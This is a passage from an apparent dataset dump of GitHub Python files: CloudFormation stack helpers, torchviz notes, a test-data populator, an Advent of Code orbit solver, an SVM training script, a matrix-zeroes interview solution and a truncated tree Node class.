","repo_name":"arnon3339/singlechip-pct","sub_path":"app/modules/mywidgets.py","file_name":"mywidgets.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19320080932","text":"import os\n\nimport boto3\nimport botocore\n\n\ndef _stack_exists(stack_name):\n \"\"\" Checks if the stack exists.\n Returns True if it exists and False if not.\n \"\"\"\n cf = boto3.client('cloudformation')\n exists = False\n try:\n cf.describe_stacks(StackName=stack_name)\n exists = True\n except botocore.exceptions.ClientError as ex:\n if ex.response['Error']['Code'] == 'ValidationError':\n exists = False\n else:\n raise\n return exists\n\n\ndef create_stack(stack_name, template):\n \"\"\" Creates the stack given the template. \"\"\"\n if _stack_exists(stack_name):\n raise Exception(\"Stack exists, stack_name=%s\" % stack_name)\n cf = boto3.client('cloudformation')\n resp = cf.create_stack(StackName=stack_name, TemplateBody=template)\n return resp['StackId']\n\n\ndef update_stack(stack_name, template):\n \"\"\" Updates the stack with the updated template. \"\"\"\n if not _stack_exists(stack_name):\n raise Exception(\"Stack does not exists, stack_name=%s\" % stack_name)\n cf = boto3.client('cloudformation')\n resp = cf.update_stack(StackName=stack_name, TemplateBody=template)\n return resp['StackId']\n\n\ndef delete_stack(stack_name):\n \"\"\" Deletes the stack. \"\"\"\n if not _stack_exists(stack_name):\n raise Exception(\"Stack does not exists, stack_name=%s\" % stack_name)\n cf = boto3.client('cloudformation')\n cf.delete_stack(StackName=stack_name)\n","repo_name":"dsouzajude/troposphere-demo","sub_path":"tdemo/core/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70080602007","text":"#! python3\n# -*- coding: utf-8 -*-\n\"\"\"\n---\n# This is YAML, see: https://yaml.org/spec/1.2/spec.html#Preview\n# !!! YAML message always begins with ---\n\ntitle: PyTorchViz\nversion: 1.0\ntype: module\nkeywords: [pytorch, computation graph, visulisation, forward/backward pass]\ndescription: |\nremarks:\ntodo:\nsources:\n - title: PyTorchViz\n link: https://github.com/szagoruyko/pytorchviz\n description: A small package to create visualizations of PyTorch execution graphs\n - title: PyTorchViz examples\n link: https://colab.research.google.com/github/szagoruyko/pytorchviz/blob/master/examples.ipynb#scrollTo=spWKUcGvPdGv\nfile:\n usage:\n interactive: True\n terminal: False\n name: torchviz.py\n path: ~/Projects/AIML/NNRL/PytTorch/\n date: 2022-03-27\n authors:\n - nick: rcando\n fullname: Arkadiusz Kasprzyk\n email:\n - rcando@int.pl\n - arek@staart.pl\n\"\"\"\n\n#%%\nimport torch\nimport torch.nn as nn\nimport torchviz as tv\n\n#%%\ndir(tv) # dot, make_dot, make_dot_from_trace\nhelp(tv.dot)\n\"\"\"\nget_fn_name(fn, show_attrs, max_attr_chars)\n\nmake_dot(var, params=None, show_attrs=False, show_saved=False, max_attr_chars=50)\n\n Produces Graphviz representation of PyTorch autograd graph.\n\n If a node represents a _backward function_, it is gray.\n\n Otherwise, the node represents a tensor and is either blue, orange, or green:\n - Blue: reachable leaf tensors that requires grad (tensors whose `.grad`\n fields will be populated during `.backward()`)\n - Orange: saved tensors of custom autograd functions as well as those\n saved by built-in backward nodes\n - Green: tensor passed in as outputs\n - Dark green: if any output is a view, we represent its base tensor with\n a dark green node.\n\n Args:\n var: output tensor\n params: dict of (name, tensor) to add names to node that requires grad\n show_attrs: whether to display non-tensor attributes of backward nodes\n (Requires PyTorch version >= 1.9)\n show_saved: whether to display saved tensor nodes that are not by custom\n autograd functions. Saved tensor nodes for custom functions, if\n present, are always displayed. (Requires PyTorch version >= 1.9)\n max_attr_chars: if show_attrs is `True`, sets max number of characters\n to display for any given attribute.\n\nmake_dot_from_trace(trace)\n This functionality is not available in pytorch core at\n https://pytorch.org/docs/stable/tensorboard.html\n\nresize_graph(dot, size_per_element=0.15, min_size=12)\n Resize the graph according to how much content it contains.\n\n Modify the graph in place.\n\"\"\"\n#%%\nimport torch\nimport torch.nn as nn\nimport torchviz as tv\n\n#%%\nmodel = nn.Sequential()\nmodel.add_module('W0', nn.Linear(8, 16))\nmodel.add_module('tanh', nn.Tanh())\nmodel.add_module('W1', nn.Linear(16, 1))\n\nx = torch.randn(1, 8)\ny = model(x)\n\ndict(model.named_parameters()) # dict( generator )\n\ntv.make_dot(y)\n\ntv.make_dot(y.mean())\n\n# add proper tensors/params names (to _leaves_ mainly)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()))\n\n# Set `show_attrs=True` and `show_saved=True`\n# to see what autograd saves for the backward pass.\n# (Note that this is only available for pytorch >= 1.9.)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()), show_attrs=True, show_saved=True)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()), show_attrs=True)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()), show_saved=True)\n\n#%%\n\n\n\n#%%\n\n\n\n#%%\n","repo_name":"RCanDo/NNRL","sub_path":"PyTorch/torchviz.py","file_name":"torchviz.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41525280585","text":"#!/usr/bin/env python3\n\nfrom sump_web import app, get_db\n\nimport time\nimport random\n\n\nif __name__ == '__main__':\n with app.app_context():\n db = get_db()\n st = int(time.time()) - 86400\n for t in range(86400):\n db.execute('INSERT INTO data VALUES(?, ?)', (st + t, random.randint(20, 40)))\n db.commit()","repo_name":"kz26/sump-sentinel","sub_path":"populate_test_data.py","file_name":"populate_test_data.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27452007502","text":"\ndef count_orbits(orbits):\n\n all = {}\n for orbit in orbits:\n\n a, b = orbit.split(\")\")\n if a not in all:\n all[a] = []\n all[a].append(b)\n\n def count_orbit(item):\n # direct orbits\n if item in all:\n return len(all[item]) + sum([count_orbit(i) for i in all[item]])\n else:\n return 0\n \n return sum([count_orbit(key) for key in all.keys()])\n\ndef count_orbital_transfers(orbits):\n\n all = {}\n for orbit in orbits:\n\n a, b = orbit.split(\")\")\n if a not in all:\n all[a] = []\n if b not in all:\n all[b] = []\n #make it bidirectional\n all[a].append(b)\n all[b].append(a)\n\n print(all)\n \n def shortest_path(source, target, path):\n if source == target:\n return path\n\n \"\"\" How many moves to get to the target?\"\"\"\n other_nodes = [p for p in all[source] if p not in path]\n paths = [shortest_path(node, target, path + [source]) for node in other_nodes]\n paths = [p for p in paths if p is not None]\n print(f\"{paths}\")\n if len(paths) > 0:\n return min(paths, key=len)\n else:\n return None\n \n return len(shortest_path(\"YOU\", \"SAN\", [])) - 2\n\n\n\ntest1 = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\".split(\"\\n\")\n\nassert(count_orbits(test1) == 42)\n\n\ntest2 = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\".split(\"\\n\")\n\nx = count_orbital_transfers(test2)\nprint(f\"x = {x}\")\nassert(x == 4)\n\norbits = open(\"day6.input\").read().split(\"\\n\")\nprint(count_orbital_transfers(orbits))\n","repo_name":"lshepard/advent-of-code","sub_path":"2019/day06-orbit-graph.py","file_name":"day06-orbit-graph.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8659723908","text":"####################\n# Import bibliotek #\n####################\n\nimport h5py\nimport numpy as np\nimport os\nimport glob\n#from sklearn.externals import joblib\nfrom sklearn import svm\nfrom sklearn import metrics\n\nprint(\"\\n\\n\")\nprint(\"[STATUS] Trenowanie...\")\n\n#################################\n# Wczytanie parametrów z plików #\n#################################\n\nh5_data_train = './/Praca MGR//Output//data.h5'\nh5_labels_train = './/Praca MGR//Output//labels.h5'\nh5_data_test = './/Praca MGR//Output//data-test.h5'\nh5_labels_test = './/Praca MGR//Output//labels-test.h5'\n\nh5f_data_train = h5py.File(h5_data_train, 'r')\nh5f_label_train = h5py.File(h5_labels_train, 'r')\nh5f_data_test = h5py.File(h5_data_test, 'r')\nh5f_label_test = h5py.File(h5_labels_test, 'r')\n\nglobal_features_string_train = h5f_data_train['dataset_1']\nglobal_labels_string_train = h5f_label_train['dataset_1']\nglobal_features_string_test = h5f_data_test['dataset_1']\nglobal_labels_string_test = h5f_label_test['dataset_1']\n\nglobal_features_train = np.array(global_features_string_train)\nglobal_labels_train = np.array(global_labels_string_train)\nglobal_features_test = np.array(global_features_string_test)\nglobal_labels_test = np.array(global_labels_string_test)\n\nh5f_data_train.close()\nh5f_label_train.close()\nh5f_data_test.close()\nh5f_label_test.close()\n\ntrainDataGlobal=global_features_train\ntrainLabelsGlobal=global_labels_train\ntestLabelsGlobal=global_labels_test\ntestDataGlobal=global_features_test\n\nprint(\"[STATUS] Dane przygotowane\")\nprint(\" Dane uczące : {}\".format(trainDataGlobal.shape))\nprint(\" Dane testujące : {}\".format(testDataGlobal.shape))\nprint(\" Klasy danych uczących : {}\".format(trainLabelsGlobal.shape))\nprint(\" Klasy danych testujących : {}\".format(testLabelsGlobal.shape))\n\n################################\n# Przygotowanie klasyfikatorów #\n################################\n\nclf = svm.SVC(kernel='linear') \nprint(\"[STATUS] Stworzono klasyfikator SVM\")\n\nclf.fit(trainDataGlobal, trainLabelsGlobal)\nprint(\"[STATUS] Trenowanie modelu zakończone\")\n\nprint(\"[STATUS] Predykcja...\")\npredLabelsGlobal = clf.predict(testDataGlobal)\n\ndata_num = len(testLabelsGlobal)\ncorrectly_tested = 0\nincorrectly_tested = 0\n\nfor i in range(0,data_num):\n current_test = testLabelsGlobal[i]\n current_pred = predLabelsGlobal[i]\n \n if(current_test == current_pred):\n correctly_tested += 1\n else: \n incorrectly_tested += 1\n\n\nprint(\"[STATUS] Predykcja zakończona\")\nprint(\" Dokładność (accuracy):\",metrics.accuracy_score(testLabelsGlobal, predLabelsGlobal))\nprint(\" Poprawnie sklasyfikowane: \", correctly_tested)\nprint(\" Niepoprawnie sklasyfikowane: \", incorrectly_tested)\n","repo_name":"kamilagontarz/image_classification","sub_path":"SVM_train.py","file_name":"SVM_train.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6163584142","text":"'''\nGiven an M x N matrix consiting of only 0 and 1, change all elements of row i and column j to 0 if cell (i,j) has value 0.\n\nInput:\n[ 1 1 0 1 1 ] r0, c2\n[ 1 1 1 1 1 ]\n[ 1 1 1 0 1 ] r2, c3\n[ 1 1 1 1 1 ]\n[ 0 1 1 1 1 ] r4, c0\n\nExpected Output:\n[ 0 0 0 0 0 ]\n[ 0 1 0 0 1 ]\n[ 0 0 0 0 0 ]\n[ 0 1 0 0 1 ]\n[ 0 0 0 0 0 ]\n\n- Consider only original input 0s -> create an output arr\n\nSolutions:\n1. as soon as we see a 0, resolve row and col\n - linear scan -> DFS to set 0s\n2. linear scan through the matrix, add i j of 0 to a set\n - after first pass, make another pass to set 0s \n - edge cases:\n - stop early if row is 0\n'''\n\n# Runtime: O(m*n)\n# Space: O(m*n + max(m, n))\ndef matrixOverride(matrix):\n\n if not len(matrix):\n return -1\n\n m, n = len(matrix), len(matrix[0])\n output = [ [1 for _ in range(n)] for _ in range(m) ]\n zeroRow, zeroCol = set(), set()\n\n # first pass to detect 0s\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n zeroRow.add(i)\n zeroCol.add(j)\n break\n\n # second pass to set 0s\n for i in range(m):\n\n # if the row is marked as 0, override\n if i in zeroRow:\n output[i] = [0]*n\n continue\n\n # row is not marked, check each col\n for j in range(n):\n if j in zeroCol:\n output[i][j] = 0\n \n return output\n\n# Testing\ncaseInput = [\n [ 1, 1, 0, 1, 1 ],\n [ 1, 1, 1, 1, 1 ],\n [ 1, 1, 1, 0, 1 ],\n [ 1, 1, 1, 1, 1 ],\n [ 0, 1, 1, 1, 1 ]\n]\ncaseOutput = [\n [0, 0, 0, 0, 0], \n [0, 1, 0, 0, 1], \n [0, 0, 0, 0, 0], \n [0, 1, 0, 0, 1], \n [0, 0, 0, 0, 0]\n]\n\nprint('Test 1')\nprint('output {}'.format(matrixOverride(caseInput)))\nprint('expected {}'.format(caseOutput))\n","repo_name":"nionata/Algorithms","sub_path":"interviews/Knightscope - Set Matrix Zeroes.py","file_name":"Knightscope - Set Matrix Zeroes.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16650051485","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 15:24:24 2021\r\n\"\"\"\r\n\r\nimport copy\r\nimport numpy as np\r\n\r\nimport sys\r\nsys.setrecursionlimit(100000)\r\n\r\n\r\nclass Node(object):\r\n \r\n \r\n def __init__(self, node = None, node_id = -1, attribute = 0, label = -1, parent = None, children = None):\r\n \r\n if node is not None:\r\n #Create a copy of a Tree instance\r\n assert isinstance(node,Node), \"The initial node must be a proper class Node\"\r\n self.__init__(node_id = copy.deepcopy(node.node_id),\r\n attribute = copy.deepcopy(node.attribute),\r\n label = copy.deepcopy(node.label),\r\n parent = copy.deepcopy(node.parent), \r\n children = copy.deepcopy(node.children)) \r\n \r\n else: #Create a Tree instance from informations\r\n \r\n #Initialization \r\n self.node_id = node_id \r\n self.node_connections = []\r\n self.children = []\r\n self.matrix_connections = None\r\n self.attribute = np.asarray([attribute])\r\n self.label = label\r\n \r\n #Link to the parent\r\n if parent is not None:\r\n assert isinstance(parent,Node), \"Error : the specified parent is not a Node object\"\r\n self.parent = parent\r\n \r\n #Set the node's depth\r\n if self.parent is not None:\r\n self.depth = self.parent.depth+1\r\n else:\r\n self.depth = 0\r\n \r\n #Add children\r\n if children is not None and children != []:\r\n for child in children:\r\n assert isinstance(child,Node)\r\n self.add_child(child) \r\n\r\n for child in self.children:\r\n self.node_connections.append([self.node_id,child.node_id])\r\n \r\n\r\n def __del__(self):\r\n del self\r\n \r\n \r\n def del_all(self):\r\n del self.node_connections\r\n del self.matrix_connections\r\n for child in self.children:\r\n child.del_all()\r\n self.parent.del_all() \r\n \r\n\r\n def set_id(self, new_id):\r\n \"\"\"\r\n Set an ID if it does not exist in the tree\r\n \"\"\"\r\n \r\n list_ids = self.get_nodes_list()\r\n if new_id in list_ids:\r\n print(\"This ID already exists, aborting.\")\r\n else:\r\n self.node_id = new_id\r\n \r\n return\r\n\r\n\r\n def reset_ids(self, count):\r\n \"\"\"\r\n Set an ID if it does not exist in the tree\r\n \"\"\"\r\n if count == 0 and self.parent is not None:\r\n root = self.get_root()\r\n root.reset_ids(0)\r\n \r\n else:\r\n self.node_id = count \r\n for b_con in self.node_connections:\r\n b_con[0] = count\r\n count+=1\r\n for i,child in enumerate(self.children):\r\n self.node_connections[i][1] = count\r\n count = child.reset_ids(count)\r\n \r\n return count\r\n\r\n\r\n def clean_ids(self, count = 0, force = False):\r\n \"\"\"\r\n Check through all the tree to avoid node_id duplicated.\r\n If count is 0, and there are duplicates in the ids, or if force is True,\r\n will reset the nodes ids.\r\n \"\"\"\r\n \r\n if not force: #Then we have to make a test first\r\n list_ids = self.get_nodes_list([])\r\n if len(list_ids)==len(np.unique(list_ids)):\r\n return\r\n \r\n else:\r\n if count == 0:\r\n root = self.get_root()\r\n root.node_id = 0\r\n count += 1\r\n for child in root.children:\r\n child.clean_ids(count, force = True) # Set force to True because no need to check the id list anymore \r\n else:\r\n self.node_id = count\r\n count+=1\r\n for child in self.children:\r\n child.clean_ids(count, force = True)\r\n \r\n return\r\n else: #force is True and we reset the nodes ids\r\n if count == 0:\r\n root = self.get_root()\r\n root.node_id = 0\r\n count += 1\r\n for child in root.children:\r\n child.clean_ids(count, force = force) \r\n else:\r\n self.node_id = count\r\n count+=1\r\n for child in self.children:\r\n child.clean_ids(count, force = force)\r\n \r\n return\r\n \r\n\r\n def update_ids(self, removed_id):\r\n \"\"\"\r\n When a node is removed, update the ids in consequence.\r\n \"\"\"\r\n \r\n for connection in self.node_connections:\r\n \r\n for c in connection:\r\n if c > removed_id:\r\n c-=1\r\n \r\n if self.node_id > removed_id:\r\n self.node_id-=1\r\n \r\n for b_con in self.node_connections:\r\n if b_con[0]>removed_id:\r\n b_con[0]-=1\r\n if b_con[1]>removed_id:\r\n b_con[1]-=1\r\n \r\n for child in self.children:\r\n child.update_ids(removed_id)\r\n \r\n return\r\n\r\n \r\n def __print__(self):\r\n print('Node : ', self.node_id)\r\n for child in self.children:\r\n child.__print__() \r\n return\r\n \r\n \r\n #%% ACCESSORS\r\n def get_nodes_list(self, list_nodes_id):\r\n \"\"\"\r\n List all the nodes id in the tree, starting at the root.\r\n\r\n Parameters\r\n ----------\r\n list_nodes_id : list\r\n The list of the nodes ids.\r\n\r\n Returns\r\n -------\r\n list_nodes_id : list\r\n The list of the nodes ids.\r\n\r\n \"\"\"\r\n \r\n if list_nodes_id == []:\r\n root = self.get_root()\r\n list_nodes_id.append(root.node_id)\r\n for child in root.children:\r\n child.get_nodes_list(list_nodes_id) \r\n else:\r\n list_nodes_id.append(self.node_id)\r\n for child in self.children:\r\n child.get_nodes_list(list_nodes_id)\r\n \r\n return list_nodes_id\r\n\r\n\r\n def get_position(self, target_id):\r\n\r\n nodes_list = self.get_root().get_nodes_list([])\r\n position = nodes_list.index(target_id)\r\n\r\n return position\r\n\r\n\r\n def get_interior_nodes_list(self, list_nodes_id = [], start = True):\r\n \"\"\"\r\n List all the nodes id in the tree, starting at the root.\r\n\r\n Parameters\r\n ----------\r\n list_nodes_id : list\r\n The list of the nodes ids.\r\n\r\n Returns\r\n -------\r\n list_nodes_id : list\r\n The list of the nodes ids.\r\n\r\n \"\"\"\r\n \r\n if start:\r\n root = self.get_root()\r\n tmp = []\r\n for child in root.children:\r\n tmp += child.get_interior_nodes_list(list_nodes_id = tmp, start = False) \r\n return tmp\r\n \r\n else:\r\n if self.children == []:\r\n return []\r\n else:\r\n tmp = []\r\n for child in self.children:\r\n tmp += child.get_interior_nodes_list(list_nodes_id = tmp, start = False)\r\n tmp = [self.node_id] + tmp\r\n return tmp\r\n \r\n\r\n def get_root(self):\r\n \r\n root = self\r\n if self.parent is not None and self.node_id!=0:\r\n root = self.parent.get_root()\r\n\r\n return root\r\n\r\n\r\n def get_node(self, node_id, start = 0):\r\n \"\"\"\r\n WARNING : \r\n The current implementation requires to search recursively through the tree.\r\n A faster method could be to build the connectivity matrix and automatically \r\n get the node we are looking for.\r\n \"\"\"\r\n target_node = None\r\n if self.node_id == node_id:\r\n return self\r\n else:\r\n for child in self.children:\r\n target_node = child.get_node(node_id) \r\n if target_node is not None:\r\n break\r\n\r\n return target_node\r\n\r\n\r\n def get_siblings(self):\r\n \"\"\"\r\n \r\n \"\"\"\r\n \r\n siblings = None\r\n if self.parent is not None:\r\n siblings = self.parent.children\r\n return siblings\r\n \r\n \r\n def is_leaf(self):\r\n \"\"\"\r\n Simple wrapper to check whether the node is a leaf.\r\n\r\n Returns\r\n -------\r\n bool\r\n Whether the branch is a leaf or not.\r\n\r\n \"\"\"\r\n return self.children==[]\r\n \r\n \r\n def get_leaves(self):\r\n \"\"\"\r\n \r\n \"\"\"\r\n \r\n if self.children == []:\r\n return [self]\r\n leaves_list = []\r\n for child in self.children:\r\n leaves_list += child.get_leaves()\r\n \r\n return leaves_list\r\n \r\n \r\n def get_leaves_IDs(self):\r\n \"\"\"\r\n Returns list of leaves IDs under the current node.\r\n \"\"\"\r\n \r\n if len(self.children)==0:return [self.node_id]\r\n l=[]\r\n for child in self.children:\r\n l+=child.get_leaves_IDs()\r\n return l \r\n \r\n \r\n def get_leaves_labels(self):\r\n \"\"\"\r\n Returns list of leaves IDs under the current node.\r\n \"\"\"\r\n \r\n if len(self.children)==0:return [self.label]\r\n l=[]\r\n for child in self.children:\r\n l+=child.get_leaves_labels()\r\n return l\r\n \r\n \r\n def ancestors(self): \r\n \"\"\"\r\n Return ancestor nodes and self node in order root->bottom\r\n\r\n Returns\r\n -------\r\n list\r\n The list of node ids from the root to the starting node.\r\n \"\"\"\r\n if self.parent==None: \r\n return [self.node_id]\r\n else: \r\n return self.parent.ancestors()+[self.node_id]\r\n \r\n \r\n def descendants(self):\r\n \"\"\"\r\n Return descendant nodes and self node in order root->bottom\r\n\r\n Returns\r\n -------\r\n list\r\n The list of nodes from starting node to the leaves.\r\n \"\"\"\r\n if self.children==[]: \r\n return [self]\r\n else: \r\n tmp = [self]\r\n for child in self.children:\r\n tmp+=child.descendants()\r\n return tmp\r\n \r\n \r\n def get_depth(self, depth = 0):\r\n \"\"\"\r\n Node\r\n\r\n Parameters\r\n ----------\r\n depth : int, optional\r\n To initialize the depth count. The default is 0.\r\n\r\n Returns\r\n -------\r\n depth : int\r\n The depth of the node.\r\n\r\n \"\"\"\r\n if self.parent is not None:\r\n depth+=1\r\n depth = self.parent.get_depth(depth = depth)\r\n \r\n return depth\r\n \r\n\r\n def get_max_depth(self):\r\n \"\"\"\r\n \r\n \"\"\"\r\n max_depth = 0\r\n root = self.get_root()\r\n leaves = root.get_leaves()\r\n\r\n for leaf in leaves:\r\n l_depth = leaf.get_depth() \r\n if l_depth > max_depth:\r\n max_depth = l_depth\r\n\r\n return max_depth\r\n \r\n \r\n def connectivity_matrix(self, force = False):\r\n \"\"\"\r\n \r\n Parameters\r\n ----------\r\n force : Boolean\r\n Whether one whant to force the nodes id reinitialization.\r\n\r\n Returns\r\n -------\r\n connections : numpy array\r\n (n_nodes x n_nodes) matrix with 1 at connected nodes.\r\n \"\"\"\r\n self.clean_ids(count = 0, force = force)\r\n \r\n list_nodes = self.get_nodes_list([])\r\n \r\n connections = np.zeros(len(list_nodes))\r\n \r\n for i, node_id in enumerate(list_nodes):\r\n \r\n node = self.get_node(node_id)\r\n \r\n for child in node.children:\r\n ind_child_list = list_nodes.find(child.node_id)\r\n connections[i,ind_child_list] = 1\r\n connections[ind_child_list,i] = 1\r\n \r\n return connections, list_nodes\r\n \r\n \r\n def lowest_common_ancestor(self, other_node):\r\n \"\"\"\r\n \r\n Parameters\r\n ----------\r\n other_node : Tree\r\n The node for which 'self' is looking for their closest common ancestor.\r\n\r\n Returns\r\n -------\r\n LCA : Tree\r\n The closest common ancestor to self and other_node.\r\n \"\"\"\r\n \r\n if self == other_node:\r\n return self\r\n \r\n LCA = self.get_root()\r\n \r\n self_depth = self.depth\r\n depth_other = other_node.depth\r\n \r\n if self_depth >= depth_other:\r\n parent = self.parent\r\n other = other_node\r\n #other_depth = depth_other\r\n else:\r\n parent = other_node.parent\r\n other = self\r\n #other_depth = self_depth\r\n \r\n list_ancestors = []\r\n found = False\r\n\r\n #First we climb the tree starting from the deepest node\r\n while parent is not None and found is False:\r\n if parent == other:\r\n LCA = parent\r\n found = True \r\n else: #parent.depth <= other_depth:\r\n list_ancestors.append(parent)\r\n parent = parent.parent\r\n \r\n \r\n if found is True:\r\n return LCA \r\n else: \r\n #The proximal node was not an ancestor, hence we climb the tree \r\n #from the highest node, and search in the first node's ancestors.\r\n parent = other.parent\r\n while parent is not None and found is False:\r\n if parent in list_ancestors:\r\n found = True\r\n LCA = parent\r\n else:\r\n parent = parent.parent\r\n \r\n return LCA\r\n \r\n \r\n #%% ADD/REMOVE\r\n def add_child(self, node, set_id = False, prepend=False):\r\n \"\"\"\r\n Add a child to self.\r\n\r\n Parameters\r\n ----------\r\n \r\n node : Tree,\r\n If provided, remove this node directly instead of searching by the \r\n node id. \r\n \r\n set_id : bool, optional (Default : False)\r\n If True, will check if the new child's id is available, and set \r\n a new one if not. \r\n \r\n prepend : bool, optional (Default : False) \r\n If True, update the branches ids and connections once the node \r\n removed.\r\n \r\n offset : bool, optional (Default : False)\r\n If True, and if merge is True, will translate the subtree to match\r\n the new parent's las point.\r\n \r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n \r\n assert isinstance(node,Node), \"the parameter node is not an instance of Node class.\"\r\n \r\n if set_id:\r\n nodes_list = self.get_nodes_list([])\r\n \r\n if (node.node_id == -1 or node.node_id in nodes_list):\r\n print('Setting a new id')\r\n node.node_id = max(nodes_list)+1\r\n node.parent = self \r\n if prepend:\r\n self.children.insert(0, node)\r\n self.node_connections.insert(0, [self.node_id,node.node_id])\r\n else:\r\n self.children.append(node)\r\n self.node_connections.append([self.node_id,node.node_id])\r\n \r\n return\r\n \r\n \r\n def add_node(self, node, parent_id = 0):\r\n assert isinstance(node,Node), \"The new node must be a proper class Node\"\r\n \r\n if self.data is None:\r\n print(\"Adding a node to an empty Node, initializing with this node\")\r\n self.__init__(node = node)\r\n else:\r\n parent = self.get_node(parent_id)\r\n if parent is not None:\r\n parent.children.append(node)\r\n node.parent = parent\r\n else:\r\n print(\"Did not find the parent in the current node (root : {0})\".format(self.node_id))\r\n return\r\n \r\n \r\n def delete_subtree(self, subtree_root_id, subtree_root = None):\r\n \r\n if subtree_root is None:\r\n subtree_root = self.get_node(subtree_root_id)\r\n \r\n for child in subtree_root.children:\r\n child.delete_subtree(child.node_id)\r\n \r\n if(subtree_root is None):\r\n print(\"Found nothing to remove\")\r\n \r\n del subtree_root\r\n \r\n return\r\n \r\n \r\n \r\n def remove_node(self, node_id, node2remove = None, merge = True, update = True):\r\n \"\"\"\r\n Remove a node in the tree and update the nodes ids. \r\n\r\n Parameters\r\n ----------\r\n node_id : int\r\n The id of the node to remove.\r\n \r\n node2remove : Tree, optional (Default : None)\r\n If provided, remove this node directly instead of searching by the \r\n node id. The default is None.\r\n \r\n merge : bool, optional (Default : True)\r\n If True, merge the descendants to the parent's children. \r\n \r\n update : bool, optional (Default : True) \r\n If True, update the branches ids and connections once the node removed.\r\n \r\n offset : bool, optional (Default : False)\r\n If True, and if merge is True, will translate the subtree to match the new parent's las point.\r\n \r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n \r\n if node2remove is None:\r\n node2remove = self.get_node(node_id)\r\n \r\n node_id2remove = node2remove.node_id\r\n \r\n if node_id2remove != node_id:\r\n print(\"Different node id asked ({0}) and selected to remove ({1})\".format(node_id, node_id2remove))\r\n \r\n if node2remove.parent is not None:\r\n if merge:\r\n for child in node2remove.children:\r\n node2remove.parent.add_child(child)\r\n \r\n parent_id = node2remove.parent.node_id\r\n node2remove.parent.children.remove(node2remove)\r\n node2remove.parent.node_connections.remove([parent_id, node2remove.node_id])\r\n \r\n if update:\r\n root = self.get_root()\r\n root.update_ids(node_id2remove)\r\n \r\n node2remove.__del__()\r\n \r\n return\r\n \r\n \r\n def move_node(self, node2move, targetparent, move_subtree = False, offset = False, update = True):\r\n \"\"\"\r\n \r\n Move a node either with its descendants or alone, and add it to a \r\n the children list of a given target node.\r\n \r\n Parameters\r\n ----------\r\n node2move : Tree\r\n The node that has to be moved.\r\n targetparent : Tree\r\n The happy parent node, to whom we add the node to move as child.\r\n move_subtree : bool\r\n If True, all the descendant follow the node to move.\r\n If False, the node to move is bypassed\r\n\r\n Returns\r\n -------\r\n None.\r\n \r\n \"\"\"\r\n assert isinstance(targetparent,Node), \"Error : the specified parent is not a Node instance\"\r\n assert isinstance(node2move,Node), \"Error : the node to move is not a Tree instance\"\r\n \r\n merge_descendent = not move_subtree\r\n \r\n node_tmp = copy.deepcopy(node2move)\r\n id_stored = node2move.node_id\r\n \r\n self.remove_node(id_stored,node2remove=node2move,merge=merge_descendent, update = update)\r\n \r\n node_tmp.node_id = id_stored\r\n if merge_descendent:\r\n node_tmp.children = []\r\n node_tmp.node_connections = []\r\n \r\n targetparent.add_child(node_tmp, offset = offset)\r\n \r\n return\r\n \r\n \r\n def insert_node(self, new_node, target_children, update = False):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n new_node : Tree\r\n The node that has to be moved.\r\n target_children : list\r\n list of children node_ids.\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n \r\n self.add_child(new_node, set_id = True)\r\n \r\n ind_sel = []\r\n \r\n for i,child in enumerate(self.children):\r\n if child.node_id in target_children:\r\n ind_sel.append(i)\r\n \r\n cpt = 0\r\n \r\n for ind in ind_sel:\r\n node2move = self.children[ind-cpt]\r\n self.move_node(node2move, new_node, move_subtree = True, update = update)\r\n cpt+=1\r\n \r\n return\r\n \r\n \r\n def find_smallest_split(self, list_leaves_ids):\r\n \"\"\"\r\n Recursive function finding the most distal node leading to the set of \r\n leaves list_leaves ids.\r\n \r\n Parameters\r\n ----------\r\n threshold : float\r\n The node that has to be merged with its parent.\r\n\r\n Returns\r\n -------\r\n next_split : Tree\r\n Returns a Tree if we found a node whose descendant leaves contains a split\r\n \"\"\"\r\n \r\n current_leaves = self.get_leaves_labels()\r\n\r\n if set(list_leaves_ids).issubset(current_leaves):\r\n \r\n for child in self.children:\r\n next_split = child.find_smallest_split(list_leaves_ids)\r\n if next_split is not None: #then we found a deeper node whose set of descendant leaves contains the list_leaves.\r\n return next_split\r\n break\r\n \r\n return self #then self is the deepest node containing the set of leaves we seek.\r\n \r\n return None\r\n \r\n \r\n ##############################################################################\r\n ##################### FUNCTIONS COPIED FROM GEOMETREE ########################\r\n ##############################################################################\r\n \r\n def newick(self,intern=False):\r\n \"\"\"\r\n Convert the tree to the newick representation. \r\n In this syntax, the interior nodes have no name, and are defined by\r\n the set of leaves (splits) one can have by removing them.\r\n \r\n Parameters\r\n ----------\r\n intern : bool (Default : False)\r\n Whether the node is interior or not.\r\n\r\n Returns\r\n -------\r\n 